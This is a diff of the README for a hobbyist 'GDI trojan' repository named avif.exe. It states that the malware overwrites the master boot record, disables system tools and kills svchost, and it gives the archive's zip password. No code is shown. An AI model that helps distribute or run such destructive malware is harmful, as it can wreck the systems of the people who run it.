tubercomiosis/avif.exe/README.md

 # avif.exe
-I put a lot of effort in this GDI trojan!
-It terminates svchost so it only works on Windows XP.
-I'M NOT RESPONSIBLE FOR ANY DAMAGES.
+My new GDI trojan
+> [!CAUTION]
+> I'M NOT RESPONSIBLE FOR ANY DAMAGES MADE USING THIS MALWARE!!
+IT WILL OVERWRITE THE MBR, DISABLE SYSTEM TOOLS AND TERMINATE SVCHOST!!!
+FOR FULL SAFETY, RUN THE VERSION WITH THE .GDIOnly BRANCH!

+> [!NOTE]
+> Zip password: avifTrojan